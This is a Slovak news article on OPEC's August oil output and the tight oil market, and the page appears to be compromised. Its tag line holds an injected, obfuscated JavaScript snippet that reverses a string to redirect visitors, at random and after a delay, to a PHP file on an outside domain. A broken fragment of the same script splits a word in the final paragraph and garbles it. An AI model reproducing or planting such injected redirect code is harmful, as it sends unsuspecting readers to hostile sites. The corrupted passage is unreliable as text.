OPEC, rokovanie, <script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>dopyt po rope, Rusko

Ťažba ropy skupinou OPEC bola v auguste najvyššia od vlaňajšieho apríla

Krajiny združené v organizácii OPEC a ich spojenci na čele s Ruskom odhadujú, že napätie na ropnom trhu pretrvá do konca roka a zásoby ropy zostanú nízke do mája 2022.

Objem ťažby organizácie OPEC v auguste vystúpil na najvyššiu úroveň od vlaňajšieho apríla. Len samotný OPEC dodal na trh priemerne 26,93 milióna barelov denne, čo je asi o 210 tisíc barelov denne viac ako v júli. Objem ropy, ktorú na trh dodal práve kartel OPEC sa nepretržite zvyšoval (až na tohtoročný február) od vlaňajšieho júna.

Napriek tomu na globálnom trhu do určitej miery pretrváva napätie s tým, ako postupne oživuje dopyt po rope, pričom ponuka nepatrne pokrivkáva. Prejavuje sa to nielen v raste ceny ropy od minuloročných rekordných minimúm, ale aj hlásenými pomerne nízkymi zásobami ropy v zásobníkoch.

Tento stav bude podľa odhadu skupiny OPEC + pretrvávať najmenej do konca tohto roka a nízka zásoba ropy vyťaženej a pripravenej k odberu bude až do mája 2022. Cena ropy je v posledných týždňoch pomerne rozkolísaná, pretože je citlivá na správy o priebehu pdom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andémie koronavírusu v súvislosti so šíriacim sa variantom delta.

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *